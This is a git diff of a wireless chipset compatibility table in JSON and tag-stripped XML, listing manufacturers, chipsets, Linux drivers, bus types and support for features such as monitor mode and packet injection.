"Notes": "staging (vendor) driver\nvt6656" + }, + { + "Manufacturer": "WavePlus", + "Chipset": "WP1200", + "Driver": "none", + "PHY Modes": "b", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI/ PCMCIA", + "Notes": "devices not common" + }, + { + "Manufacturer": "Winbond", + "Chipset": "W89C33D", + "Driver": "none", + "PHY Modes": "b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI", + "Notes": "devices not common" + }, + { + "Manufacturer": "Winbond", + "Chipset": "W89C35D", + "Driver": "winbond", + "PHY Modes": "b/g", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "?", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "USB 2.0", + "Notes": "staging (vendor) driver only supports 'b'\nw35und" + }, + { + "Manufacturer": "ZyDAS", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "ZyDAS", + "Chipset": "ZD1201", + "Driver": "zd1201", + "PHY Modes": "b", + "Encrypt.": "WEP", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "y", + "Inj.": "?", + "Bus": "USB 1.0", + "Notes": "zd1201" + }, + { + "Manufacturer": "ZyDAS", + "Chipset": "ZD1201", + "Driver": "zdsta", + "PHY Modes": "b", + "Encrypt.": "WEP", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "n", + "Bus": "USB 1.0", + "Notes": "obsolete vendor driver" + }, + { + "Manufacturer": "ZyDAS", + "Chipset": "ZD1201", + "Driver": "zdsta", + "PHY Modes": "b", + "Encrypt.": "WEP", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "n", + "Bus": "PCMCIA", + "Notes": "obsolete vendor driver, devices not common" + }, + { + "Manufacturer": "ZyDAS", + "Chipset": "ZD1202", + "Driver": "zdsta", + "PHY Modes": "b", + "Encrypt.": "WEP", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "n", + "Bus": "PCI/CB/ PCMCIA", + "Notes": "obsolete vendor driver, devices not common" + }, + { + "Manufacturer": "ZyDAS", + "Chipset": "ZD1211/ZD1211B", + "Driver": "zd1211rw", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "y", + "Monitor": "y", + "Inj.": "y", + "Bus": "USB 1.0", + "Notes": "5GHz band not supported, no hw crypto\nzd1211rw" + }, + { + "Manufacturer": "ZyDAS", + "Chipset": "ZD1212/ZD1212B", + "Driver": "zd1212", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "", + "Monitor": "", + "Inj.": "n", + "Bus": "PCI/CB", + "Notes": "obsolete vendor driver, devices not common" + }, + { + "Manufacturer": "Manufacturer", + "Chipset": "Chipset", + "Driver": "Driver", + "PHY Modes": "PHY Modes", + "Encrypt.": "Station", + "Station": "Ad-hoc", + "Ad-hoc": "AP", + "AP": "Monitor", + "Mesh": "Bus", + "Monitor": "Notes", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Aironet", + "Chipset": "ARLAN", + "Driver": "arlan", + "PHY Modes": "pre-b (900MHz or 2.4GHz)", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "ISA", + "Monitor": "driver abandoned", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Lucent", + "Chipset": "WaveLAN", + "Driver": "wavelan", + "PHY Modes": "pre-b (900MHz or 2.4GHz)", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "PCMCIA/ISA", + "Monitor": "driver abandoned", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Raytheon", + "Chipset": "Raylink", + "Driver": "ray_cs", + "PHY Modes": "2.4GHz FHSS", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "PCMCIA", + "Monitor": "USB variants not supported", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "ShareWave", + "Chipset": "chipset before\nBodega (Epic?)", + "Driver": "none", + "PHY Modes": "Whitecap", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "PCI/PCMCIA", + "Monitor": "uncommon devices", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Symbol", + "Chipset": "Spectrum24 FHSS", + "Driver": "none", + "PHY Modes": "2.4GHz FHSS", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "PCMCIA", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Xircom", + "Chipset": "Netwave", + "Driver": "netwave_cs", + "PHY Modes": "pre-b, 1Mb", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "PCMCIA", + "Monitor": "driver abandoned", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "AMD", + "Chipset": "Am79C930\n(presumably)", + "Driver": "wl3501_cs", + "PHY Modes": "2Mb, pre-802.11b", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "PCMCIA", + "Monitor": "PRISM I based RF", + "Inj.": "", + "Bus": "", + "Notes": "" + } ] \ No newline at end of file diff --git a/misc/devices.xml b/misc/devices.xml index a312fe4..8082228 100644 --- a/misc/devices.xml +++ b/misc/devices.xml @@ -1,2164 +1,2164 @@ - - - - ADMtek - ADM8211, ADM8211B - adm8211 - WEP - ? - ? - ? - ? - ? - ? - PCI/CB - currently broken AFAIK -adm8211 - b - - - Agere - HERMES II (WL60010) - wlags49_h2 - ? - y - ? - n - n - n - n - PCI/ PCMCIA - staging (vendor) driver -wlags49_h2 - b - - - Agere - HERMES II.5 (WL60040) - wlags49_h25 - ? - y - ? - n - n - n - n - PCI/ PCMCIA - staging (vendor) driver, not all devices supported -wlags49_h25 - (a)/b/g - - - Airgo - AGN100/AGN300 pre-N - agnx - - n - n - n - n - n - n - PCI/CB - driver never completed, abandoned -agnx - (a)b/g - - - Airgo - AGN300 pre-N USB - none - - - - - - - - USB 2.0 - devices not common - b/g - - - Aironet / -Cisco - 4500, 4800, -Cisco 340/350 - airo - WEP, WPA-TKIP - y - ? - ? - n - y - n - ISA/PCI /PCMCIA - airo - b - - - ALi - M4301A - none - - - - - - - - PCI/CB - devices not common (mainly WUSB11 v4) - b - - - AMD - Alchemy AM1772 - none - - - - - - - - PCI/CB - see this abomination - b - - - Atheros - - - - - - - - - - - - - - - Atheros - AR5000 - ath5k - - b - b - b - b - y - b - PCI/CB - tx support currently broken -ath5k - a - - - Atheros - AR5001A-AR5007EG - ath5k - WEP, WPA, WPA2 - y - y - y - y - y - y - PCI/PCIe /CB - ath5k - (a)/b/(g) - - - Atheros - AR5000-AR5007EG - madwifi - WEP, WPA, WPA2 - y - y - y - ? - y - ? - PCI/PCIe /CB - superseded by ath5k - (a)/b/(g) - - - Atheros - AR5513 -(Data Falcon) - none - - - - - - - - PCI/CB - somewhat relevant - (a)/b/g - - - Atheros - AR5005U (AR5523) - ar5523 - WEP, WPA, WPA2 - n - n - n - n - y - n - USB 2.0 - driver never completed, 5GHz mode non-functional? -ar5523 - (a)/b/g - - - Atheros - AR5005U (AR5523) - athusbwlan - WEP, WPA, WPA2 - y - ? - n - n - n - n - USB 2.0 - obsolete vendor driver - (a)/b/g - - - Atheros - AR9001U -(AR9170) - carl9170 - WEP, WPA, WPA2 - y - y - y - n - y - y - USB 2.0 - carl9170 - (a)/b/g/n - - - Atheros - AR600x - ar6k - WEP, WPA, WPA2 - y - ? - ? - ? - ? - ? - SDIO - - (a)/b/g - - - Atheros - AR6003 - ath6kl - WEP, WPA, WPA2 - y - y - n - n - n - ? - SDIO - driver currently in staging -0271:0402 -ath6kl - a/b/g/n - - - Atheros - AR9374 - ath6kl - - - - - - - - USB 2.0 - 0cf3:9375 -ath6kl - (a)/b/g/n - - - Atheros - AR2427+AR5008 -+AR900x - ath9k - WEP, WPA, WPA2 - y - y - y - y - y - y - PCI/PCIe /CB - fcs check broken in monitor mode since ~2.6.33 -ath9k - (a)/b/g/(n) - - - Atheros - AR9002U -(AR9271, AR7010) - ath9k_htc - WEP, WPA, WPA2 - y - y - y - y - y - y - USB 2.0 - 0411:0197 -ath9k_htc - (a)/b/g/n - - - Qualcomm Atheros - QCA6164, QCA6174, -QCA9880 v2, QCA9882 v2 -QCA9890 v2, QCA9892 v2 - ath10k - WEP, WPA, WPA2 - y - y - y - n - y - y - PCIe - +3.11 (4.3) -168c:003e -168c:0041 -ath10k - a/b/g/n (+ac) - - - Qualcomm Atheros - Wilocity Wil6210 -802.11ad 60GHz - wil6210 - - - - - - - - PCIe - wil6210 - a/b/g/n (+ac+ad) - - - Qualcomm - WFB400 - none - - - - - - - - PCI/ PCIe/ CB/ USB 2.0 - unknown if released, -Airgo AGN400 - (a)/b/g/n - - - Atmel - - - - - - - - - - - - - - - Atmel - AT76C502A - atmel - WEP - y - ? - n - n - ? - n - PCMCIA - atmel cs - b - - - Atmel - AT76C503A, AT76C505(A) - at76c50x-usb - WEP - y - n - n - n - beacons - n - USB 1.0 - at76c50x-usb - b - - - Broadcom - - - - - - - - - - - - - - - Broadcom - BCM4301, BCM4307, BCM4306r2 - b43legacy - WEP, WPA, WPA2 - y - y - y - y - y - y - PCI/CB/ PCMCIA - ssb -b43legacy - b/(g) - - - Broadcom - BCM4306r3, BCM4311, BCM4312, BCM4309, BCM4318(E), BCM4321, BCM4322 - b43 - WEP, WPA, WPA2 - y - y - y - y - y - y - PCI/PCIe /CB - ssb, no HT mode support -b43 - (a)/b/g/(n) - - - Broadcom - BCM43224, BCM43225, BCM4331 - b43 - WEP, WPA, WPA2 - y - y - y - y - y - y - PCIe - bcma, no HT mode support, no current 5GHz support -b43 - (a)/b/g/n - - - Broadcom - BCM4311, BCM4313, BCM4321, BCM4322, BCM4322x, BCM43225, BCM43227, BCM43228 - wl - WEP, WPA, WPA2 - y - y - n - n - n - n - PCIe - vendor driver -wl - (a)/b/g/(n) - - - Broadcom - BCM4320 and other -rndis variants - rndis_wlan - - y - y - n - n - n - n - USB 2.0 - rndis wlan - b/g - - - Broadcom - BCM4323x - none - - - - - - - - USB 2.0 - possible future support w/ brcmfmac? (probably not) - (a)/b/g/n - - - Broadcom - BCM43235, BCM43236, BCM43238 -(chip revision dependent) - brcmfmac - y - ? - ? - ? - ? - n - n - USB 2.0 - patch adding support recently added -brcmfmac - (a)/b/g/n - - - Broadcom - BCM4326U - none - - - - - - - - USB 2.0 - - b/g - - - Broadcom - BCM4329 - brcmfmac - WEP, WPA, WPA2 - y - ? - ? - ? - n - n - SDIO - brcmfmac - a/b/g/n - - - Broadcom - BCM43224, BCM43225 - brcmsmac - WEP, WPA, WPA2 - y - ? - ? - ? - y - ? - PCIe - BCMA -brcmsmac - (a)/b/g/n - - - Conexant - - - - - - - - - - - - - - - Conexant - CX53111 - none - - - - - - - - SDIO - - b/g - - - Conexant - CX53822 - none - - - - - - - - CF - - (a)/b/g - - - Envara - WiND502/512 - none - - - - - - - - USB 2.0 - WiND512 (b/g) devices common - (a)/b/g - - - Inprocomm - IPN2120, IPN2220 - none - ? - - - - - - - PCI/CB - - b/(g) - - - Inprocomm - IPN2128 - none - ? - - - - - - - SDIO - - b - - - Intel - - - - - - - - - - - - - - - Intel - PRO/Wireless 2100B - ipw2100 - ? - y - y - n - n - y - ? - PCI - ipw2100 - b - - - Intel - PRO/Wireless 2200BG, 2915ABG - ipw2200 - WEP, WPA, WPA2 - y - y - oot - n - ? - ? - PCI - ipw2200 - (a)/b/g - - - Intel - PRO/Wireless 3945ABG - iwl3945 - WEP, WPA, WPA2 - y - y - n - n - y - y - PCI - iwl3945 - a/b/g - - - Intel - Wireless WiFi Link 4965AGN - iwl4965 - WEP, WPA, WPA2 - y - y - n - n - y - y - PCI - iwl4965 - a/b/g/n - - - Intel - WiFi Link 5100, 5150, 5300, 5350 - Centrino 100, 130, 1000, 1030, 6150, 6200, 6250, 6300 - iwlagn - WEP, WPA, WPA2 - y - y - n - n - y - y - PCI - iwlagn -iwlwifi - (a)/b/g/n - - - Intel - IWMC3200 (Evans Peak) - iwmc3200 - WEP, WPA, WPA2 - y - y - n - n - n - n - SDIO - iwmc3200 - a/b/g - - - Intersil - - - - - - - - - - - - - - - Intersil - PRISM 2/2.5/3 -PCI/CF/PCMCIA - hostap - ? - y - ? - y - n - y - y - PCI/CB /USB - hostap - b - - - Intersil - PRISM 2.5/3 USB - prism2_usb - WEP - y - ? - n - n - y - b - PCI/CB /USB - staging driver from linux-wlan-ng -prism2 usb - b - - - Intersil - ISL3877, ISL3880, -ISL3890, ISL3886 - p54pci - WEP, WPA, WPA2 - y - y - y - y - y - y - PCI/CB - p54pci - (a)/b/g - - - Intersil - ISL3880/ISL3886 -+ NET2280, ISL3887 - p54usb - WEP, WPA, WPA2 - y - y - y - y - y - y - USB 2.0 - p54usb - (a)/b/g - - - Lucent - HERMES I (WaveLAN -/IEEE/ORiNOCO) - orinoco - WEP, WPA-TKIP - y - y - n - n - y - oot - PCI/ PCMCIA/ USB 1.0 - no Bronze support -orinoco -orinoco usb - b - - - Marvell - - - - - - - - - - - - - - - Marvell -(Libertas) - 88W8310 - none - - - - - - - - PCI/CB - - b/g - - - Marvell -(Libertas) - 88W8335 - mrv8k - - - - - - - - PCI/CB - mrv8k - b/g - - - Marvell -(Libertas) - 88W8338 - none - - - - - - - - USB 2.0 - - b/g - - - Marvell -(Libertas) - 88W8385, -88W8388, 88W8686 - libertas - ? - y - y - n - n - n - n - USB/CF /SDIO - libertas - b/g - - - Marvell -(Libertas) - 88W8388 - libertas_tf - ? - y - n - y - ? - ? - ? - USB/CF /SDIO - OLPC XO-1, -supports mesh - b/g - - - Marvell -(TopDog) - 88W8360, 88W8361, -88W8362 (USB), -88W8362E, 88W8363 - none - - - - - - - - PCI/PCIe/ CB/USB2.0 - - (a)/b/g/n - - - Marvell -(TopDog/ -Avastar*) - 88W8366, 88W8863, -88W8687, 88W8764* - mwl8k - ? - y - ? - y - ? - y - ? - PCIe - mwl8k - (a)/b/g/n - - - Marvell -(Avastar) - 88W8797 (88W8786U) - mwifiex - ? - ? - ? - ? - ? - ? - ? - USB - 1286:2049 -mwifiex - a/b/g/n - - - Marvell -(Avastar) - 88W8786, 88W8787, -88W8797, 88W8897* - mwifiex - ? - ? - ? - ? - ? - ? - ? - SDIO - 02df:9139 -mwifiex - a/b/g/n (+ac)* - - - Marvell -(Avastar) - 88W8766, 88W8897* - mwifiex - ? - ? - ? - ? - ? - ? - ? - PCIe - 11ab:2b38 -mwifiex - a/b/g/n (+ac)* - - - Marvell -(Avastar) AC* - 88W8864*, 88W8897* - mwlwifi - ? - ? - ? - ? - ? - ? - ? - PCIe - iwlwifi -WRT1900 -iwlwifi - a/b/g/n (+ac)* - - - Marvell - unknown - mrvl_cb82 - - - - - - - - - - - - - MediaTek - - - - - - - - - - - - - - - MediaTek - MT5911N - none - - - - - - - - SDIO - - b/g - - - MediaTek - MT7601U - mt7601u - - - - - - - - USB - vendor driver - a/b/g/n - - - MediaTek - MT7610U - mt7601u - - - - - - - - USB - vendor driver - a/b/g/n (+ac)* - - - Metalink - MtW817x - none - - - - - - - - PCI - - a/(b)/(g)/n - - - No Wires Needed - Swallow - swallow_cs - WEP - y - ? - n - n - n - n - PCMCIA - obsolete out of kernel driver - b - - - No Wires Needed - Poldhu - poldhu - WEP - y - y - n - n - n - n - PCMCIA - obsolete out of kernel driver -poldhu cs - b - - - Ralink - - - - - - - - - - - - - - - Ralink - RT2460 - rt2400pci - ? - y - y - y - n - y - y - PCI/CB - - b - - - Ralink - RT2560 - rt2500pci - WEP, WPA, WPA2 - y - y - y - n - y - y - PCI/CB - - (a)/b/g - - - Ralink - RT2561, RT2561S, RT2661 - rt61pci - WEP, WPA, WPA2 - y - y - y - n - y - y - PCI/CB - - (a)/b/g - - - Ralink - RT2571, RT2572 - rt2500usb - WEP, WPA, WPA2 - y - y - y - n - y - y - USB 2.0 - - (a)/b/g - - - Ralink - RT2571W, RT2573, RT2671 - rt73usb - WEP, WPA, WPA2 - y - y - y - n - y - y - USB 2.0 - - (a)/b/g - - - Ralink - RT2760, RT2790, RT2860, RT2880, RT2890, RT3052, RT3090, RT3091, RT3092, RT3390, RT3060, RT3062, RT3562, RT3592, RT5390, RT3290 - rt2800pci - WEP, WPA, WPA2 - y - ? - y - ? - y - y - PCI/PCIe /CB - Wiki - (a)/b/g/n - - - Ralink - RT2760, RT2790, RT2860, RT2880, RT2890, RT3052, RT309x - rt2860sta - WEP, WPA, WPA2 - y - ? - y - ? - y - n - PCI/PCIe /CB - vendor driver - (a)/b/g/n - - - Ralink - RT2770, RT2870, RT2070, RT3070, RT3071, RT3072, RT3370, RT3572, RT5370, RT5572, RT8070 - rt2800usb - WEP, WPA, WPA2 - y - y - y - y (??) - y - y - USB 2.0 - Wiki - (a)b/g/(n) - - - Ralink - RT2770, RT2870, RT2070, RT307x - rt2870sta - WEP, WPA, WPA2 - y - ? - ? - n - n - n - USB 2.0 - vendor driver - (a)/b/g/(n) - - - Ralink - RT3572 - rt3572sta - WEP, WPA, WPA2 - y - ? - ? - ? - n - n - USB 2.0 - - a/b/g/n - - - Ralink - RT3573 - none - - - - - - - - USB 2.0 - three stream - a/b/g/n - - - Realtek - - - - - - - - - - - - - - - Realtek - RTL8180L, RTL8185L, -RTL8187SE (3.15+) - rtl8180 - WEP, WPA, WPA2 - y - n - n - n - y - ? - PCI/CB - - b/(g) - - - Realtek - RTL8187L, RTL8187B - rtl8187 - WEP, WPA, WPA2 - y - n - n - n - y - y - USB 2.0 - - b/g - - - Realtek - RTL8187SE - rtl8187se - WEP, WPA, WPA2 - y - ? - ? - ? - ? - ? - PCI - - b/g - - - Realtek - RTL8190 - r8190_pci - ? - ? - ? - ? - ? - ? - ? - PCI -/ CB - vendor driver - b/g/n - - - Realtek - RTL8192E - r8192e_pci - WEP, WPA, WPA2 - y - ? - ? - ? - ? - ? - PCIe - staging (vendor) driver - (a)/b/g/n - - - Realtek - RTL8191SE, RTL8192SE - rtl8192se - WEP, WPA, WPA2 - y - ? - ? - ? - ? - ? - PCIe - - b/g/n - - - Realtek - RTL8192U - r8192u_usb - WEP, WPA, WPA2 - y - ? - ? - ? - ? - ? - USB 2.0 - staging (vendor) driver - b/g/n - - - Realtek - RTL8188SU, RTL8191SU, RTL8192SU - r8712u - WEP, WPA, WPA2 - y - ? - ? - ? - ? - n - USB 2.0 - staging (vendor) driver - b/g/n - - - Realtek - RTL8188SU, RTL8191SU, RTL8192SU - r8192s_usb - WEP, WPA, WPA2 - y - ? - ? - ? - y - ? - USB 2.0 - staging (vendor) driver, superseded by r8712u - b/g/n - - - Realtek - RTL8188CE, RTL8192CE - rtl8192ce - WEP, WPA, WPA2 - y - ? - ? - ? - ? - n - PCIe - - b/g/n - - - Realtek - RTL8188CUS, RTL8192CU, RTL8188RU - rtl8192cu - WEP, WPA, WPA2 - y - y - n - ? - y - n - USB 2.0 - - b/g/n - - - Realtek - RTL8192DU - rtl8192du - WEP, WPA, WPA2 - y - ? - ? - ? - ? - ? - USB 2.0 - driver available here, may panic on init on some kernels - a/b/g/n - - - Realtek - RTL8192DE - rtl8192de - WEP, WPA, WPA2 - y - ? - ? - ? - ? - n - PCIe - - a/b/g/n - - - Renesas - - - - - - - - - - - - - - - Renesas - KS7010 - ks7010 - ? - ? - ? - ? - ? - ? - ? - SDIO - from Javi Roman - b - - - ShareWave / Cirrus Logic - Bodega - none - - - - - - - - PCI/ PCMCIA/ USB 1.0 - rare devices, support the proprietary Whitecap protocol - b - - - SiS - 160 - sis160 - ? - y - ? - n - n - n - n - PCI - rare devices, driver is a useless binary blob - b - - - SiS - 162, 162U - sis162 - ? - y - y - n - n - n - n - PCI/ USB 2.0 - driver is a useless binary blob - b - - - SiS - 163, 163U - none - - - - - - - - PCI/CF/ USB 2.0 - - b/g - - - ST-Ericsson - CW1100, CW1200 - cw1200 - - - - - - - - SDIO -/ PCI - (since 3.11) - b/g - - - ST-NXP - STLC4560 - p54spi - WEP, WPA, WPA2 - y - y - y - y - y - y - SPI - - b/g - - - Symbol - Spectrum24 DS - orinoco - WEP - y - ? - n - n - y - n - PCI/ PCMCIA - orinoco - b - - - Syntek/3DSP - unknown -(Bluew-2310x) - none - ? - - - - - - - PCI - compiled modules available - b/g - - - Syntek/3DSP - STK9100+STK9230 -(Bluew-2310u) - 3dspusbwlan - ? - - - - - - - USB 2.0 - partial source? - b/g - - - Texas Instruments - - - - - - - - - - - - - - - Texas Instruments - ACX100 (TNETW1100), ACX101 (TNETW1100B), ACX111 (TNETW1130), TNETW1450 - acx1xx - WEP, WPA, WPA2 - y - ? - n - n - y - ? - PCI/CB /USB - acx100 -acx - b/(g) - - - Texas Instruments - WL1251 - wl1251 - WEP, WPA, WPA2 - y - y - n - ? - y - ? - SPI/ SDIO - - b/g - - - Texas Instruments - WL1271 - wl1271 - WEP, WPA, WPA2 - y - y - y - n - n - n - SPI/ SDIO - - (a)/b/g/n - - - VIA - VT6551 - none - ? - ? - ? - ? - ? - ? - ? - PCI - - b - - - VIA - VT6555 - vt6655 - ? - y - ? - ? - ? - ? - n - PCI - staging (vendor) driver -vt6656 - (a)/b/g - - - VIA - VT6556 - vt6656 - ? - y - ? - ? - ? - ? - n - PCI - staging (vendor) driver -vt6656 - (a)/b/g - - - WavePlus - WP1200 - none - - - - - - - - PCI/ PCMCIA - devices not common - b - - - Winbond - W89C33D - none - - - - - - - - PCI - devices not common - b/g - - - Winbond - W89C35D - winbond - ? - y - ? - n - n - n - n - USB 2.0 - staging (vendor) driver only supports 'b' -w35und - b/g - - - ZyDAS - - - - - - - - - - - - - - - ZyDAS - ZD1201 - zd1201 - WEP - y - ? - ? - ? - y - ? - USB 1.0 - zd1201 - b - - - ZyDAS - ZD1201 - zdsta - WEP - y - ? - ? - ? - ? - n - USB 1.0 - obsolete vendor driver - b - - - ZyDAS - ZD1201 - zdsta - WEP - y - ? - ? - ? - ? - n - PCMCIA - obsolete vendor driver, devices not common - b - - - ZyDAS - ZD1202 - zdsta - WEP - - - - - - n - PCI/CB/ PCMCIA - obsolete vendor driver, devices not common - b - - - ZyDAS - ZD1211/ZD1211B - zd1211rw - WEP, WPA, WPA2 - y - y - y - y - y - y - USB 1.0 - 5GHz band not supported, no hw crypto -zd1211rw - (a)/b/g - - - ZyDAS - ZD1212/ZD1212B - zd1212 - WEP, WPA, WPA2 - y - y - y - - - n - PCI/CB - obsolete vendor driver, devices not common - (a)/b/g - - - Manufacturer - Chipset - Driver - Station - Ad-hoc - AP - Monitor - Bus - Notes - - - - PHY Modes - - - Aironet - ARLAN - arlan - ? - ? - ? - ? - ISA - driver abandoned - - - - pre-b (900MHz or 2.4GHz) - - - Lucent - WaveLAN - wavelan - ? - ? - ? - ? - PCMCIA/ISA - driver abandoned - - - - pre-b (900MHz or 2.4GHz) - - - Raytheon - Raylink - ray_cs - ? - ? - ? - ? - PCMCIA - USB variants not supported - - - - 2.4GHz FHSS - - - ShareWave - chipset before -Bodega (Epic?) - none - - - - - PCI/PCMCIA - uncommon devices - - - - Whitecap - - - Symbol - Spectrum24 FHSS - none - - - - - PCMCIA - - - - - 2.4GHz FHSS - - - Xircom - Netwave - netwave_cs - ? - ? - ? - ? - PCMCIA - driver abandoned - - - - pre-b, 1Mb - - - AMD - Am79C930 -(presumably) - wl3501_cs - ? - ? - ? - ? - PCMCIA - PRISM I based RF - - - - 2Mb, pre-802.11b - + + + + ADMtek + ADM8211, ADM8211B + adm8211 + WEP + ? + ? + ? + ? + ? + ? + PCI/CB + currently broken AFAIK +adm8211 + b + + + Agere + HERMES II (WL60010) + wlags49_h2 + ? + y + ? + n + n + n + n + PCI/ PCMCIA + staging (vendor) driver +wlags49_h2 + b + + + Agere + HERMES II.5 (WL60040) + wlags49_h25 + ? + y + ? + n + n + n + n + PCI/ PCMCIA + staging (vendor) driver, not all devices supported +wlags49_h25 + (a)/b/g + + + Airgo + AGN100/AGN300 pre-N + agnx + + n + n + n + n + n + n + PCI/CB + driver never completed, abandoned +agnx + (a)b/g + + + Airgo + AGN300 pre-N USB + none + + + + + + + + USB 2.0 + devices not common + b/g + + + Aironet / +Cisco + 4500, 4800, +Cisco 340/350 + airo + WEP, WPA-TKIP + y + ? + ? + n + y + n + ISA/PCI /PCMCIA + airo + b + + + ALi + M4301A + none + + + + + + + + PCI/CB + devices not common (mainly WUSB11 v4) + b + + + AMD + Alchemy AM1772 + none + + + + + + + + PCI/CB + see this abomination + b + + + Atheros + + + + + + + + + + + + + + + Atheros + AR5000 + ath5k + + b + b + b + b + y + b + PCI/CB + tx support currently broken +ath5k + a + + + Atheros + AR5001A-AR5007EG + ath5k + WEP, WPA, WPA2 + y + y + y + y + y + y + PCI/PCIe /CB + ath5k + (a)/b/(g) + + + Atheros + AR5000-AR5007EG + madwifi + WEP, WPA, WPA2 + y + y + y + ? + y + ? + PCI/PCIe /CB + superseded by ath5k + (a)/b/(g) + + + Atheros + AR5513 +(Data Falcon) + none + + + + + + + + PCI/CB + somewhat relevant + (a)/b/g + + + Atheros + AR5005U (AR5523) + ar5523 + WEP, WPA, WPA2 + n + n + n + n + y + n + USB 2.0 + driver never completed, 5GHz mode non-functional? +ar5523 + (a)/b/g + + + Atheros + AR5005U (AR5523) + athusbwlan + WEP, WPA, WPA2 + y + ? + n + n + n + n + USB 2.0 + obsolete vendor driver + (a)/b/g + + + Atheros + AR9001U +(AR9170) + carl9170 + WEP, WPA, WPA2 + y + y + y + n + y + y + USB 2.0 + carl9170 + (a)/b/g/n + + + Atheros + AR600x + ar6k + WEP, WPA, WPA2 + y + ? + ? + ? + ? + ? + SDIO + + (a)/b/g + + + Atheros + AR6003 + ath6kl + WEP, WPA, WPA2 + y + y + n + n + n + ? + SDIO + driver currently in staging +0271:0402 +ath6kl + a/b/g/n + + + Atheros + AR9374 + ath6kl + + + + + + + + USB 2.0 + 0cf3:9375 +ath6kl + (a)/b/g/n + + + Atheros + AR2427+AR5008 ++AR900x + ath9k + WEP, WPA, WPA2 + y + y + y + y + y + y + PCI/PCIe /CB + fcs check broken in monitor mode since ~2.6.33 +ath9k + (a)/b/g/(n) + + + Atheros + AR9002U +(AR9271, AR7010) + ath9k_htc + WEP, WPA, WPA2 + y + y + y + y + y + y + USB 2.0 + 0411:0197 +ath9k_htc + (a)/b/g/n + + + Qualcomm Atheros + QCA6164, QCA6174, +QCA9880 v2, QCA9882 v2 +QCA9890 v2, QCA9892 v2 + ath10k + WEP, WPA, WPA2 + y + y + y + n + y + y + PCIe + +3.11 (4.3) +168c:003e +168c:0041 +ath10k + a/b/g/n (+ac) + + + Qualcomm Atheros + Wilocity Wil6210 +802.11ad 60GHz + wil6210 + + + + + + + + PCIe + wil6210 + a/b/g/n (+ac+ad) + + + Qualcomm + WFB400 + none + + + + + + + + PCI/ PCIe/ CB/ USB 2.0 + unknown if released, +Airgo AGN400 + (a)/b/g/n + + + Atmel + + + + + + + + + + + + + + + Atmel + AT76C502A + atmel + WEP + y + ? + n + n + ? + n + PCMCIA + atmel cs + b + + + Atmel + AT76C503A, AT76C505(A) + at76c50x-usb + WEP + y + n + n + n + beacons + n + USB 1.0 + at76c50x-usb + b + + + Broadcom + + + + + + + + + + + + + + + Broadcom + BCM4301, BCM4307, BCM4306r2 + b43legacy + WEP, WPA, WPA2 + y + y + y + y + y + y + PCI/CB/ PCMCIA + ssb +b43legacy + b/(g) + + + Broadcom + BCM4306r3, BCM4311, BCM4312, BCM4309, BCM4318(E), BCM4321, BCM4322 + b43 + WEP, WPA, WPA2 + y + y + y + y + y + y + PCI/PCIe /CB + ssb, no HT mode support +b43 + (a)/b/g/(n) + + + Broadcom + BCM43224, BCM43225, BCM4331 + b43 + WEP, WPA, WPA2 + y + y + y + y + y + y + PCIe + bcma, no HT mode support, no current 5GHz support +b43 + (a)/b/g/n + + + Broadcom + BCM4311, BCM4313, BCM4321, BCM4322, BCM4322x, BCM43225, BCM43227, BCM43228 + wl + WEP, WPA, WPA2 + y + y + n + n + n + n + PCIe + vendor driver +wl + (a)/b/g/(n) + + + Broadcom + BCM4320 and other +rndis variants + rndis_wlan + + y + y + n + n + n + n + USB 2.0 + rndis wlan + b/g + + + Broadcom + BCM4323x + none + + + + + + + + USB 2.0 + possible future support w/ brcmfmac? (probably not) + (a)/b/g/n + + + Broadcom + BCM43235, BCM43236, BCM43238 +(chip revision dependent) + brcmfmac + y + ? + ? + ? + ? + n + n + USB 2.0 + patch adding support recently added +brcmfmac + (a)/b/g/n + + + Broadcom + BCM4326U + none + + + + + + + + USB 2.0 + + b/g + + + Broadcom + BCM4329 + brcmfmac + WEP, WPA, WPA2 + y + ? + ? + ? + n + n + SDIO + brcmfmac + a/b/g/n + + + Broadcom + BCM43224, BCM43225 + brcmsmac + WEP, WPA, WPA2 + y + ? + ? + ? + y + ? + PCIe + BCMA 